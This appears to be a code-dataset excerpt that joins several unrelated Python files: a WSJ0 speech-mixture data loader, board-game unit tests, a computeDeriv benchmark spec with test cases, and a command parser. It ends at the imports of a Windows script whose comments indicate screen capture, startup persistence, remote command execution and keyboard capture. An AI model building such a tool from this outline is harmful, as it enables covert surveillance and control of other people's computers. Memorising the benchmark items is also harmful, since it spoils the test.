'../../../../DL4SS_Keras/Torch_multi/Dataset_Multi/1/' + config.DATASET\naim_path = '../../DL4SS_Keras/Torch_multi/Dataset_Multi/1/' + config.DATASET\n# aim_path = '../../../DL4SS_Keras/Torch_multi/Dataset_Multi/1/' + config.DATASET\n# 训练文件列表\nTRAIN_LIST = aim_path + '/train_list'\n# 验证文件列表\nVALID_LIST = aim_path + '/valid_list'\n# 测试文件列表\nTEST_LIST = aim_path + '/test_list'\n# 未登录文件列表\nUNK_LIST = aim_path + '/unk_list'\n\noutput_tmp_wav = 0\nnum_rounds= 2\naverage_speech_len = int(0.2 * config.FRAME_RATE)\nconfig.silence_dur = 2 * config.FRAME_RATE\n\ndef random_len(length,ratio=0.5):\n return length+random.randint(int(-1.0*ratio*length),int(1.0*ratio*length)) # randint needs integer bounds\n\ndef pad_list(xs, pad_value):\n n_batch = len(xs)\n max_len = max(x.size(0) for x in xs)\n pad = xs[0].new(n_batch, max_len, * xs[0].size()[1:]).fill_(pad_value)\n for i in range(n_batch):\n pad[i, :xs[i].size(0)] = xs[i]\n return pad\n\ndef get_energy_order(multi_spk_fea_list):\n # Input: B个dict,每个dict里是名字和fea\n order=[]\n for one_line in multi_spk_fea_list:\n dd=sorted(list(one_line.items()),key= lambda d:d[1].sum(),reverse=True)\n dd=[d[0] for d in dd]\n order.append(dd)\n return order\n\ndef _collate_fn(mix_data,source_data,raw_tgt=None):\n \"\"\"\n Args:\n batch: list, len(batch) = 1. See AudioDataset.__getitem__()\nReturns:\n mixtures_pad: B x T, torch.Tensor\n ilens : B, torch.Tensor\n sources_pad: B x C x T, torch.Tensor\n \"\"\"\n mixtures, sources = mix_data,source_data\n if raw_tgt is None: #如果没有给定顺序\n raw_tgt = [sorted(spk.keys()) for spk in source_data]\n # sources= models.rank_feas(raw_tgt, source_data,out_type='numpy') # 这里是目标的图谱,aim_size,wav_len\n sources=[]\n for each_feas, each_line in zip(source_data, raw_tgt):\n sources.append(np.stack([each_feas[spk] for spk in each_line]))\n sources=np.array(sources)\n\n # get batch of lengths of input sequences\n ilens = np.array([mix.shape[0] for mix in mixtures])\n\n # perform padding and convert to tensor\n pad_value = 0\n # mixtures_pad = pad_list([mix.float() for mix in mixtures], pad_value)\n ilens = ilens\n # sources_pad = pad_list([torch.from_numpy(s).float() for s in sources], pad_value)\n # N x T x C -> N x C x T\n # sources_pad = sources_pad.permute((0, 2, 1)).contiguous()\n return mixtures, ilens, sources\n # return mixtures_pad, ilens, sources_pad\n\ndef split_forTrainDevTest(spk_list, train_or_test):\n '''为了保证一个统一的训练和测试的划分标准,不得不用通用的一些方法来限定一下,\n 这里采用的是用sorted先固定方法的排序,那么不论方法或者seed怎么设置,训练测试的划分标准维持不变,\n 也就是数据集会维持一直'''\n length = len(spk_list)\n # spk_list=sorted(spk_list,key=lambda x:(x[1]))#这个意思是按照文件名的第二个字符排序\n # spk_list=sorted(spk_list)#这个意思是按照文件名的第1个字符排序,暂时采用这种\n spk_list = sorted(spk_list, key=lambda x: (x[-1])) # 这个意思是按照文件名的最后一个字符排序\n # TODO:暂时用最后一个字符排序,这个容易造成问题,可能第一个比较不一样的,这个需要注意一下\n if train_or_test == 'train':\n return spk_list[:int(round(0.7 * length))]\n elif train_or_test == 'valid':\n return spk_list[(int(round(0.7 * length)) + 1):int(round(0.8 * length))]\n elif train_or_test == 'test':\n return spk_list[(int(round(0.8 * length)) + 1):]\n else:\n raise ValueError('Wrong input of train_or_test.')\n\n\ndef prepare_datasize(gen):\n data = next(gen)\n # 此处顺序是 mix_speechs.shape,mix_feas.shape,aim_fea.shape,aim_spkid.shape,query.shape\n # 一个例子:(5, 17040) (5, 134, 129) (5, 134, 129) (5,) (5, 32, 400, 300, 3)\n # 暂时输出的是:语音长度、语音频率数量、视频截断之后的长度\n # print('datasize:', data[1].shape[1], data[1].shape[2], data[4].shape[1], data[-1], (data[4].shape[2], data[4].shape[3]))\n return data[1].shape[1], data[1].shape[2], data[4].shape[1], data[-1], (data[4].shape[2], 
data[4].shape[3])\n\n\ndef prepare_data(mode, train_or_test, min=None, max=None):\n '''\n :param\n mode: type str, 'global' or 'once' , global用来获取全局的spk_to_idx的字典,所有说话人的列表等等\n train_or_test:type str, 'train','valid' or 'test'\n 其中把每个文件夹每个人的按文件名的排序的前70%作为训练,70-80%作为valid,最后20%作为测试\n :return:\n '''\n # 如错有预订的min和max,主要是为了主程序做valid的时候统一某个固定的说话人的个数上\n if min:\n config.MIN_MIX = min\n if max:\n config.MAX_MIX = max\n\n mix_speechs = np.zeros((config.batch_size, 2*config.MAX_LEN+config.silence_dur))\n mix_feas = [] # 应该是bs,n_frames,n_fre这么多\n mix_phase = [] # 应该是bs,n_frames,n_fre这么多\n mix_angle = [] # 应该是bs,n_frames,n_fre这么多\n aim_fea = [] # 应该是bs,n_frames,n_fre这么多\n aim_spkid = [] # np.zeros(config.batch_size)\n aim_spkname = [] # np.zeros(config.batch_size)\n query = [] # 应该是batch_size,shape(query)的形式,用list再转换把\n multi_spk_fea_list = [] # 应该是bs个dict,每个dict里是说话人name为key,clean_fea为value的字典\n multi_spk_wav_list = [] # 应该是bs个dict,每个dict里是说话人name为key,clean_fea为value的字典\n multi_spk_angle_list = [] # 应该是bs个dict,每个dict里是说话人name为key,clean_fea为value的字典\n\n # 目标数据集的总data,底下应该存放分目录的文件夹,每个文件夹应该名字是sX\n data_path = aim_path + '/data'\n # 语音刺激\n if config.MODE == 1:\n if config.DATASET == 'WSJ0': # 开始构建数据集\n WSJ0_eval_list = ['440', '441', '442', '443', '444', '445', '446', '447']\n WSJ0_test_list = ['22g', '22h', '050', '051', '052', '053', '420', '421', '422', '423']\n all_spk_train = os.listdir(data_path + '/train')\n all_spk_eval = os.listdir(data_path + '/eval')\n all_spk_test = os.listdir(data_path + '/test')\n all_spk_evaltest = os.listdir(data_path + '/eval_test')\n all_spk = all_spk_train + all_spk_eval + all_spk_test\n spk_samples_list = {}\n batch_idx = 0\n list_path = '../../../../DL4SS_Keras/TDAA_beta/create-speaker-mixtures/'\n list_path = '../../DL4SS_Keras/TDAA_beta/create-speaker-mixtures/'\n # list_path = '../../../DL4SS_Keras/TDAA_beta/create-speaker-mixtures/'\n all_samples_list = {}\n sample_idx = {}\n number_samples = {}\n batch_mix = {}\n mix_number_list = range(config.MIN_MIX, config.MAX_MIX + 1)\n number_samples_all = 0\n for mix_k in mix_number_list:\n if train_or_test == 'train':\n aim_list_path = list_path + 'mix_{}_spk_tr.txt'.format(mix_k)\n if train_or_test == 'valid':\n aim_list_path = list_path + 'mix_{}_spk_cv.txt'.format(mix_k)\n if train_or_test == 'test':\n aim_list_path = list_path + 'mix_{}_spk_tt.txt'.format(mix_k)\n\n all_samples_list[mix_k] = open(aim_list_path).readlines()#[:31]\n number_samples[mix_k] = len(all_samples_list[mix_k])\n batch_mix[mix_k] = len(all_samples_list[mix_k]) / config.batch_size\n number_samples_all += len(all_samples_list[mix_k])\n\n sample_idx[mix_k] = 0 # 每个通道从0开始计数\n\n if train_or_test == 'train' and config.SHUFFLE_BATCH:\n random.shuffle(all_samples_list[mix_k])\n print('\\nshuffle success!', all_samples_list[mix_k][0])\n\n batch_total = number_samples_all / config.batch_size\n print('batch_total_num:', batch_total)\n\n mix_k = random.sample(mix_number_list, 1)[0]\n mix_speechs = np.zeros((config.batch_size, num_rounds * average_speech_len * mix_k))\n # while True:\n for ___ in range(number_samples_all):\n if ___ == number_samples_all - 1:\n print('ends here.___')\n yield False\n mix_len = 0\n print(mix_k, 'mixed sample_idx[mix_k]:', sample_idx[mix_k], batch_idx)\n if sample_idx[mix_k] >= batch_mix[mix_k] * config.batch_size:\n print(mix_k, 'mixed data is over~trun to the others number.')\n mix_number_list.remove(mix_k)\n try:\n mix_k = random.sample(mix_number_list, 1)[0]\n except ValueError:\n print('seems there gets all over.')\n if 
len(mix_number_list) == 0:\n print('all mix number is over~!')\n yield False\n # mix_k=random.sample(mix_number_list,1)[0]\n batch_idx = 0\n mix_speechs = np.zeros((config.batch_size, config.MAX_LEN))\n mix_speechs = np.zeros((config.batch_size, num_rounds * average_speech_len * mix_k))\n mix_feas = [] # 应该是bs,n_frames,n_fre这么多\n mix_phase = []\n mix_angle= []\n aim_fea = [] # 应该是bs,n_frames,n_fre这么多\n aim_spkid = [] # np.zeros(config.batch_size)\n aim_spkname = []\n query = [] # 应该是batch_size,shape(query)的形式,用list再转换把\n multi_spk_fea_list = []\n multi_spk_angle_list = []\n multi_spk_order_list=[] #用来管理每个混合语音里说话人的能俩给你大小的order\n multi_spk_wav_list = []\n continue\n\n all_over = 1 # 用来判断所有的是不是都结束了\n for kkkkk in mix_number_list:\n if not sample_idx[kkkkk] >= batch_mix[mix_k] * config.batch_size:\n print(kkkkk, 'mixed data is not over')\n all_over = 0\n break\n if all_over:\n print('all mix number is over~!')\n yield False\n\n # mix_k=random.sample(mix_number_list,1)[0]\n if train_or_test == 'train':\n aim_spk_k = random.sample(all_spk_train, mix_k) # 本次混合的候选人\n elif train_or_test == 'eval':\n aim_spk_k = random.sample(all_spk_eval, mix_k) # 本次混合的候选人\n elif train_or_test == 'test':\n aim_spk_k = random.sample(all_spk_test, mix_k) # 本次混合的候选人\n elif train_or_test == 'eval_test':\n aim_spk_k = random.sample(all_spk_evaltest, mix_k) # 本次混合的候选人\n\n aim_spk_k = re.findall('/([0-9][0-9].)/', all_samples_list[mix_k][sample_idx[mix_k]])\n # aim_spk_db_k = map(float, re.findall(' (.*?) ', all_samples_list[mix_k][sample_idx[mix_k]]))\n aim_spk_db_k = [float(dd) for dd in re.findall(' (.*?) ', all_samples_list[mix_k][sample_idx[mix_k]])]\n aim_spk_samplename_k = re.findall('/(.{8})\\.wav ', all_samples_list[mix_k][sample_idx[mix_k]])\n assert len(aim_spk_k) == mix_k == len(aim_spk_db_k) == len(aim_spk_samplename_k)\n\n multi_fea_dict_this_sample = {}\n multi_wav_dict_this_sample = {}\n multi_name_list_this_sample = []\n multi_db_dict_this_sample = {}\n\n # if 1 and config.dB and config.MIN_MIX==config.MAX_MIX==2:\n # dB_rate=10**(config.dB/20.0*np.random.rand())#e**(0——0.5)\n # print('channel to change with dB:',dB_rate\n\n for k, spk in enumerate(aim_spk_k):\n # 选择dB的通道~!\n sample_name = aim_spk_samplename_k[k]\n if train_or_test != 'test':\n spk_speech_path = data_path + '/' + 'train' + '/' + spk + '/' + sample_name + '.wav'\n else:\n spk_speech_path = data_path + '/' + 'eval_test' + '/' + spk + '/' + sample_name + '.wav'\n\n signal, rate = sf.read(spk_speech_path) # signal 是采样值,rate 是采样频率\n if len(signal.shape) > 1:\n signal = signal[:, 0]\n if rate != config.FRAME_RATE:\n # 如果频率不是设定的频率则需要进行转换\n signal = resampy.resample(signal, rate, config.FRAME_RATE, filter='kaiser_best')\n\n random_shift= 16000\n signal = np.append(signal[random_shift:], signal[:random_shift])\n\n config.MAX_LEN=random_len(average_speech_len,0.1)\n if signal.shape[0] > config.MAX_LEN: # 根据最大长度裁剪\n signal = signal[:config.MAX_LEN]\n # 更新混叠语音长度\n if signal.shape[0] > mix_len:\n mix_len = signal.shape[0]\n\n this_spk_signal_list=[]\n signal -= np.mean(signal) # 语音信号预处理,先减去均值\n signal /= np.max(np.abs(signal)) # 波形幅值预处理,幅值归一化\n\n # 如果需要augment数据的话,先进行随机shift, 以后考虑固定shift\n if config.AUGMENT_DATA and train_or_test == 'train':\n random_shift = random.sample(range(len(signal)), 1)[0]\n signal = np.append(signal[random_shift:], signal[:random_shift])\n\n if signal.shape[0] < config.MAX_LEN: # 根据最大长度用 0 补齐,\n signal = np.append(signal, np.zeros(config.MAX_LEN - signal.shape[0]))\n\n this_spk_signal_list.append(signal)\n for spk_idx in 
range(num_rounds-1): # for the rest rounds of spks\n signal1, rate = sf.read('/'.join(spk_speech_path.split('/')[:-1])+'/'+random.choice(os.listdir('/'.join(spk_speech_path.split('/')[:-1])))) # signal 是采样值,rate 是采样频率\n config.MAX_LEN = random_len(average_speech_len,0.1)\n if len(signal1.shape) > 1:\n signal1 = signal1[:, 0]\n if rate != config.FRAME_RATE:\n # 如果频率不是设定的频率则需要进行转换\n signal1 = resampy.resample(signal1, rate, config.FRAME_RATE, filter='kaiser_best')\n random_shift = 16000\n signal = np.append(signal[random_shift:], signal[:random_shift])\n if signal1.shape[0] > config.MAX_LEN: # 根据最大长度裁剪\n signal1 = signal1[:config.MAX_LEN]\n\n signal1 -= np.mean(signal1) # 语音信号预处理,先减去均值\n signal1 /= np.max(np.abs(signal1)) # 波形幅值预处理,幅值归一化\n\n # 如果需要augment数据的话,先进行随机shift, 以后考虑固定shift\n if config.AUGMENT_DATA and train_or_test == 'train':\n random_shift = random.sample(range(len(signal1)), 1)[0]\n signal1 = np.append(signal1[random_shift:], signal1[:random_shift])\n\n if signal1.shape[0] < config.MAX_LEN: # 根据最大长度用 0 补齐,\n signal1 = np.append(signal1, np.zeros(config.MAX_LEN - signal1.shape[0]))\n\n this_spk_signal_list.append(signal1)\n\n if k == 0: # 第一个作为目标\n this_spk_wav = np.zeros((num_rounds * average_speech_len * mix_k))\n ratio = 10 ** (aim_spk_db_k[k] / 20.0)\n this_spk_signal_list_new= []\n for sig in this_spk_signal_list:\n new_sig = sig*ratio\n ratio = 1 / ratio # 轮流交换幅度的变化\n interval_time = np.zeros(random_len((mix_k-1)*average_speech_len,0.5))\n this_spk_signal_list_new.append(new_sig)\n if sig is not this_spk_signal_list[-1]:\n this_spk_signal_list_new.append(interval_time)\n\n signal = np.concatenate(this_spk_signal_list_new,0)\n tmp_len=np.min((signal.size,this_spk_wav.size),0)\n this_spk_wav[:tmp_len]=signal[:tmp_len]\n aim_spkname.append(aim_spk_k[0])\n # aim_spk=eval(re.findall('\\d+',aim_spk_k[0])[0])-1 #选定第一个作为目标说话人\n # TODO:这里有个问题是spk是从1开始的貌似,这个后面要统一一下 --> 已经解决,构建了spk和idx的双向索引\n\n signal = this_spk_wav\n aim_spkid.append(aim_spkname)\n wav_mix = signal\n aim_fea_clean = np.transpose(np.abs(librosa.core.spectrum.stft(signal, config.FRAME_LENGTH,\n config.FRAME_SHIFT)))\n if output_tmp_wav:\n sf.write('batch_output_test/{}_{}_real.wav'.format(batch_idx,0),signal,8000)\n aim_fea.append(aim_fea_clean)\n # 把第一个人顺便也注册进去混合dict里\n multi_fea_dict_this_sample[spk] = aim_fea_clean\n multi_wav_dict_this_sample[spk] = signal\n\n else:\n this_spk_wav = np.zeros((num_rounds * average_speech_len * mix_k))\n ratio = 10 ** (aim_spk_db_k[k] / 20.0)\n this_spk_signal_list_new= []\n\n interval_time = np.zeros(random_len(k* average_speech_len, 0.5))\n this_spk_signal_list_new.append(interval_time)\n for sig in this_spk_signal_list:\n new_sig = sig*ratio\n ratio = 1 / ratio # 轮流交换幅度的变化\n interval_time = np.zeros(random_len((mix_k-1)*average_speech_len,0.5))\n this_spk_signal_list_new.append(new_sig)\n if sig is not this_spk_signal_list[-1]:\n this_spk_signal_list_new.append(interval_time)\n signal = np.concatenate(this_spk_signal_list_new,0)\n tmp_len=np.min((signal.size,this_spk_wav.size),0)\n this_spk_wav[:tmp_len]=signal[:tmp_len]\n signal = this_spk_wav\n if output_tmp_wav:\n sf.write('batch_output_test/{}_{}_real.wav'.format(batch_idx,k),signal,8000)\n\n wav_mix = wav_mix + signal # 混叠后的语音\n #  这个说话人的语音\n some_fea_clean = np.transpose(np.abs(librosa.core.spectrum.stft(signal, config.FRAME_LENGTH,\n config.FRAME_SHIFT, )))\n multi_fea_dict_this_sample[spk] = some_fea_clean\n multi_wav_dict_this_sample[spk] = signal\n\n if output_tmp_wav:\n 
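# Debug-only dump (sketch): writes the summed mixture as an 8 kHz wav so a batch\n # can be checked by ear; per-speaker tracks were dumped the same way above.\n 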
sf.write('batch_output_test/{}_mix.wav'.format(batch_idx),wav_mix, 8000)\n multi_spk_fea_list.append(multi_fea_dict_this_sample) # 把这个sample的dict传进去\n multi_spk_wav_list.append(multi_wav_dict_this_sample) # 把这个sample的dict传进去\n\n # 这里采用log 以后可以考虑采用MFCC或GFCC特征做为输入\n if config.IS_LOG_SPECTRAL:\n feature_mix = np.log(np.transpose(np.abs(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH,\n config.FRAME_SHIFT,\n window=config.WINDOWS)))\n + np.spacing(1))\n else:\n feature_mix = np.transpose(np.abs(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH,\n config.FRAME_SHIFT, )))\n\n mix_speechs[batch_idx, :] = wav_mix\n mix_feas.append(feature_mix)\n mix_phase.append(np.transpose(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH, config.FRAME_SHIFT, )))\n mix_angle.append(np.angle(np.transpose(librosa.core.spectrum.stft(wav_mix, config.FRAME_LENGTH, config.FRAME_SHIFT, ))))\n batch_idx += 1\n # print('batch_dix:{}/{},'.format(batch_idx,config.batch_size),)\n if batch_idx == config.batch_size: # 填满了一个batch\n # 下一个batch的混合说话人个数, 先调整一下\n mix_k = random.sample(mix_number_list, 1)[0]\n mix_feas = np.array(mix_feas)\n mix_phase = np.array(mix_phase)\n aim_fea = np.array(aim_fea)\n mix_angle = np.array(mix_angle)\n # aim_spkid=np.array(aim_spkid)\n query = np.array(query)\n print(('spk_list_from_this_gen:{}'.format(aim_spkname)))\n print(('aim spk list:', [list(one.keys()) for one in multi_spk_fea_list]))\n batch_ordre=get_energy_order(multi_spk_fea_list)\n # print('\\nmix_speechs.shape,mix_feas.shape,aim_fea.shape,aim_spkname.shape,query.shape,all_spk_num:'\n # print(mix_speechs.shape,mix_feas.shape,aim_fea.shape,len(aim_spkname),query.shape,len(all_spk)\n if mode == 'global':\n all_spk = sorted(all_spk)\n all_spk = sorted(all_spk_train)\n all_spk.insert(0, '') # 添加两个结构符号,来标识开始或结束。\n all_spk.append('')\n all_spk_eval = sorted(all_spk_eval)\n all_spk_test = sorted(all_spk_test)\n dict_spk_to_idx = {spk: idx for idx, spk in enumerate(all_spk)}\n dict_idx_to_spk = {idx: spk for idx, spk in enumerate(all_spk)}\n yield {'all_spk': all_spk,\n 'dict_spk_to_idx': dict_spk_to_idx,\n 'dict_idx_to_spk': dict_idx_to_spk,\n 'num_fre': aim_fea.shape[2], # 语音频率\n 'num_frames': aim_fea.shape[1], # 语音长度\n 'total_spk_num': len(all_spk),\n 'total_batch_num': batch_total\n }\n elif mode == 'once':\n yield {'mix_wav': mix_speechs,\n 'mix_feas': mix_feas,\n 'mix_phase': mix_phase,\n 'mix_angle': mix_angle,\n 'aim_fea': aim_fea,\n 'aim_spkname': aim_spkname,\n 'query': query,\n 'num_all_spk': len(all_spk),\n 'multi_spk_fea_list': multi_spk_fea_list,\n 'multi_spk_wav_list': multi_spk_wav_list,\n 'multi_spk_angle_list': multi_spk_angle_list,\n 'batch_order': batch_ordre,\n 'batch_total': batch_total,\n 'tas_zip': _collate_fn(mix_speechs,multi_spk_wav_list,batch_ordre)\n }\n elif mode == 'tasnet':\n yield _collate_fn(mix_speechs,multi_spk_wav_list)\n\n batch_idx = 0\n mix_speechs = np.zeros((config.batch_size, num_rounds * average_speech_len * mix_k))\n mix_feas = [] # 应该是bs,n_frames,n_fre这么多\n mix_phase = []\n mix_angle = []\n aim_fea = [] # 应该是bs,n_frames,n_fre这么多\n aim_spkid = [] # np.zeros(config.batch_size)\n aim_spkname = []\n query = [] # 应该是batch_size,shape(query)的形式,用list再转换把\n multi_spk_fea_list = []\n multi_spk_wav_list = []\n multi_spk_angle_list = []\n sample_idx[mix_k] += 1\n\n else:\n raise ValueError('No such dataset:{} for Speech.'.format(config.DATASET))\n pass\n\n # 图像刺激\n elif config.MODE == 2:\n pass\n\n # 视频刺激\n elif config.MODE == 3:\n raise ValueError('No such dataset:{} for 
Video'.format(config.DATASET))\n # 概念刺激\n elif config.MODE == 4:\n pass\n\n else:\n raise ValueError('No such Model:{}'.format(config.MODE))\n\n# aa=prepare_data('tasnet','train')\n# bb=next(aa)\n# bb=next(aa)\n#\n# print(bb)\n","sub_path":"TDAAv4_PIT_23/predata_fromList_123_2rounds.py","file_name":"predata_fromList_123_2rounds.py","file_ext":"py","file_size_in_byte":26908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"258457740","text":"import unittest\nfrom board import Board\nfrom move import Move\n\n\nletter_grid = [['a1', 'a2', 'a3','a4','a5'],\n ['b1', 'b2', 'b3','b4','b5'],\n ['c1','c2','c3','c4','c5'],\n ['d1','d2','d3','d4','d5'],\n ['e1','e2','e3','e4','e5'],\n ]\nnumber_grid = [[0, 1, 0, 0, 0],\n [1, 1, 0, 1, 1],\n [0, 0, 0, 2, 1],\n [0, 2, 0, 2, 0],\n [2, 0, 2, 1, 2],\n ]\n\n\nclass BoardTest(unittest.TestCase):\n def test_print(self):\n b = Board()\n b.grid = number_grid\n b.print_board()\n\n def test_legal(self):\n b = Board()\n b.grid = number_grid\n mv = Move.from_desc(\"b2\")\n self.assertEqual(b.move_ok(mv), False)\n mv = Move.from_desc(\"b1\")\n self.assertEqual(b.move_ok(mv), True)\n\n def test_gen_move(self):\n b = Board()\n b.grid = number_grid\n mvs = b.gen_moves()\n for mv in mvs:\n print(mv.name())\n\n def test_capture(self):\n b = Board()\n b.grid = number_grid\n b.capture(4, 3)\n print(b.grid)\n b.capture(1, 1)\n print(b.grid)\n\n def test_copy(self):\n b = Board()\n bo = Board()\n bo.copy(b)\n bo.grid[0][0] = 1\n self.assertNotEqual(bo.grid[0][0], b.grid[0][0])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_board.py","file_name":"test_board.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"88636858","text":"helper_str = \"\"\"\n\"\"\"\n\ndef computeDeriv(poly):\n result = []\n i = 1\n if len(poly) == 1:\n result.append(0.0)\n while i < len(poly):\n result.append(poly[i] * float(i))\n i += 1\n return result\n\ndef same_output(x, y):\n return x == y\n\ntest_cases = [\n ([-13.39, 0.0, 17.5, 3.0, 1.0],),\n ([1.0, 4.0, 2.0],),\n ([4.0],),\n ([2.3, 4.4],)\n]\n\n","sub_path":"benchmarks/computeDeriv/spec.py","file_name":"spec.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"346748814","text":"\r\nimport re\r\nfrom krparser import KrParser\r\nfrom krlib.krfactory import KrFactory\r\nfrom krlib.krdev import *\r\nfrom krlib.types.krstring import KrString\r\nfrom krlib.types.krbase import KrTypeBase\r\nfrom krlib.types.krint import KrInteger\r\nfrom krlib.types.krurl import KrUrl\r\n\r\nREGEX = re.compile(r'^(\\.(\\w+) *\\().*\\)')\r\n\r\n\r\n\r\nclass KrCommandParser(KrParser):\r\n\r\n\tdef __init__(self, *args):\r\n\t\tsuper(KrCommandParser, self).__init__(args)\r\n\t\tself.m_functions = []\r\n\t\tself.m_name = \"\"\r\n\t\tself.m_params = []\r\n\t\tself.m_prefix = \"\"\r\n\t\t\r\n\r\n\tdef parse(self, str, pos, prefix):\r\n\t\tKrDebug.debug(1, \"Parsing string |%s|\" % str[pos:])\r\n\t\tself.m_prefix = prefix\r\n\t\tif prefix in \"$.+?{}[]\":\r\n\t\t\tregex = re.compile(r'(^\\%s(\\w+) *\\().*\\)' % prefix)\r\n\t\telse:\r\n\t\t\tregex = re.compile(r'(^z%s(\\w+) *\\().*\\)' % prefix)\r\n\r\n\t\tmatch = regex.search(str[pos:])\r\n\t\tif not match:\r\n\t\t\tKrDebug.debug(\"not found\")\r\n\t\t\treturn pos\r\n\r\n\t\tKrDebug.debug(2, \"name '%s' found\" % match.group(2))\r\n\t\t#if not 
self.isValidCommand(match.group(2)):\r\n\t\t#\treturn self.onParseFail(str, str, \"Unknown command %s\" % match.group(2))\r\n\t\tself.m_name = match.group(2)\r\n\t\topos = pos\r\n\t\tpos += len(match.group(1))\r\n\t\tret = self.parseParams(str, pos)\r\n\t\tif ret == pos:\r\n\t\t\treturn opos\r\n\t\treturn self.onParseSuccess(str, pos)\r\n\t\t\r\n\t\t\t\r\n\tdef parseParams(self, str, pos):\r\n\t\tKrDebug.debug(1, \"Parsing params at <%s>\" % str[pos:])\r\n\t\tis_string = False\r\n\t\tbuff = \"\"\r\n\t\topos = pos\r\n\t\twhile pos < len(str):\r\n\t\t\tif str[pos] == ')' and not is_string:\r\n\t\t\t\tif buff != \"\":\r\n\t\t\t\t\tKrDebug.debug(2, \"Param <%s> found\" % buff)\r\n\t\t\t\t\tself.saveParam(buff)\r\n\t\t\t\treturn pos+1\r\n\t\t\t\r\n\t\t\tif str[pos] == is_string and str[pos-1] != '\\\\':\r\n\t\t\t\tKrDebug.debug(2, \"String Param <%s> found\" % buff)\r\n\t\t\t\tself.saveParam(buff, KrString)\r\n\t\t\t\tis_string = False\r\n\t\t\t\tbuff = \"\"\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tif (str[pos] == '\"' or str[pos] == \"'\") and not is_string:\r\n\t\t\t\tKrDebug.debug(3, \"Starting String Mode |%s|\" % str[pos:])\r\n\t\t\t\tis_string = str[pos]\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tif str[pos] == \",\" and not is_string:\r\n\t\t\t\tKrDebug.debug(2, \"Param <%s> found\" % buff)\r\n\t\t\t\tif buff != \"\":\r\n\t\t\t\t\tself.saveParam(buff)\r\n\t\t\t\t\tbuff = \"\"\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\tif str[pos] == \" \" and not is_string:\r\n\t\t\t\tpos += 1\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tif KrFactory.getCommandParser(str[pos], None) and not is_string:\r\n\t\t\t\tKrDebug.debug(2, \"Command found at <%s>\" % str[pos:])\r\n\t\t\t\ts = KrFactory.getCommandParser(str[pos])()\r\n\t\t\t\tret = s.parse(str, pos, str[pos])\r\n\t\t\t\tif ret == pos:\r\n\t\t\t\t\treturn self.onParseFail(str, opos)\r\n\t\t\t\tpos = ret\r\n\t\t\t\tself.saveParam(s)\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tbuff += str[pos]\r\n\t\t\tpos += 1\r\n\t\treturn opos # no closing ')' was found\r\n\r\n\tdef saveParam(self, param, type_=None):\r\n\t\tp = None\r\n\t\tif isinstance(param, KrParser):\r\n\t\t\tp = param\r\n\t\telif type_ == KrString or not param.isdigit():\r\n\t\t\tp = KrString(param)\r\n\t\telif param.isdigit():\r\n\t\t\tp = KrInteger(int(param))\r\n\t\tself.m_params.append(p)\r\n\t\tKrDebug.debug(50, \"Param of type %s saved\" % type(p))\r\n\t\t\t\r\n\tdef isValidCommand(self):\r\n\t\treturn \"%s%s\" % (self.m_prefix, self.m_name) in KrParser.s_command\r\n\t\t\r\n\tdef isValidParam(self, param):\r\n\t\treturn True\r\n\t\t\t\r\n\tdef onParseFail(self, str, return_, error=None):\r\n\t\t#KrDebug.debug(0, \"ERROR : when parsing %s \\r\\n %s\" % (str, error ))\r\n\t\treturn return_\r\n\t\r\n\tdef getValue(self, **kwargs):\r\n\t\tparams = []\r\n\t\tfor i in self.m_params:\r\n\t\t\t#print \"!!! 
%s\" % i\r\n\t\t\tif isinstance(i, KrParser):\r\n\t\t\t\tparams.append(i.getValue(kwargs.get('context')))\r\n\t\t\telif isinstance(i, KrTypeBase):\r\n\t\t\t\ti.setContext(kwargs.get('context'))\r\n\t\t\t\tparams.append(i)\r\n\t\t\telse:\r\n\t\t\t\traise(self.__clas__, \"Unkwown type for eval\")\r\n\t\tif not KrFactory.getCommand('%s%s' % (self.m_prefix, self.m_name), None):\r\n\t\t\traise Exception(\"Can't find command '%s%s'\" % (self.m_prefix, self.m_name))\r\n\t\treturn KrFactory.getCommand('%s%s' % (self.m_prefix, self.m_name))(*params, **kwargs)\r\n\t\t\r\n\t\t\r\n\r\n\tdef onParseSuccess(self, str, pos):\r\n\r\n\t\treturn pos\r\n\t\t\r\n\t\tstr = KrParser.onParseSuccess(self, str)\r\n\t\tostr = str\r\n\t\tmatch = REGEX.search(str)\r\n\t\twhile match:\r\n\t\t\tf = KrParser()\r\n\t\t\tret = f.parseCommand(str, '.')\r\n\t\t\tif ret == str:\r\n\t\t\t\treturn ostr\r\n\t\t\tstr = ret\r\n\t\t\tself.m_functions.append(f)\r\n\t\t\tif len(str) == 0:\r\n\t\t\t\tbreak\r\n\t\t\tmatch = REGEX.search(str)\r\n\t\treturn str\r\n\r\nKrFactory.registerCommandParser('$', KrCommandParser)\r\n\r\n\t\t","sub_path":"krlib/krparser/krcommand.py","file_name":"krcommand.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"234335089","text":"# v3.0\n\nimport os, os.path, platform, ctypes\nos.environ[\"PBR_VERSION\"]='5.0.0'\nimport logging\nfrom winreg import *\nfrom consoleTools import consoleDisplay as cd\nfrom PIL import ImageGrab # /capture_pc\nfrom shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv\nfrom sys import argv, path, stdout # console output\nfrom json import loads # reading json from ipinfo.io\nfrom winshell import startup # persistence\nfrom tendo import singleton # this makes the application exit if there's another instance already running\nfrom win32com.client import Dispatch # WScript.Shell\nfrom time import strftime, sleep\nfrom subprocess import Popen, PIPE # /cmd_exec\nfrom getpass import getuser # Obtiene el nombre del usuario\nimport psutil # updating\nfrom pynput.keyboard import Key, 